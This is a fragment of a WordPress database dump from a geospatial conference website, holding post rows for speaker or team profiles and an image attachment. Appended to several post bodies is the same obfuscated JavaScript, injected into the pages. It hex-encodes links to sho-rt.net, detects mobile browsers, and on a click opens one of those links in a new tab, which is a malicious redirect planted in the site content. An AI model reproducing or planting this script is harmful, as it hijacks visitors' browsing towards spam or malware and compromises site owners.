_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 18:39:42','2023-01-01 18:39:42','',3497,'https://gsw2023.com/?p=3501',0,'revision','',0),
(3502,1,'2023-01-01 18:49:23','2023-01-01 18:49:23','<!-- wp:paragraph -->\n<p>European Commission - Joint Research Centre (JRC)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Digital Economy Unit, Italy (ICWG IV/III/II)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Marco Minghini','','publish','closed','closed','','marco-minghini','','','2023-01-01 19:01:28','2023-01-01 19:01:28','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3502',0,'dt_team','',0),
(3503,1,'2023-01-01 18:48:54','2023-01-01 18:48:54','','w271','','inherit','open','closed','','w271','','','2023-01-01 18:48:54','2023-01-01 18:48:54','',3502,'https://gsw2023.com/wp-content/uploads/2023/01/w271.jpg',0,'attachment','image/jpeg',0),
(3504,1,'2023-01-01 18:53:17','2023-01-01 18:53:17','<!-- wp:paragraph -->\n<p>Department of Science, Applications and Climate</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>D/EOP, European Space Agency, Italy (ICWG IV/III/II)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 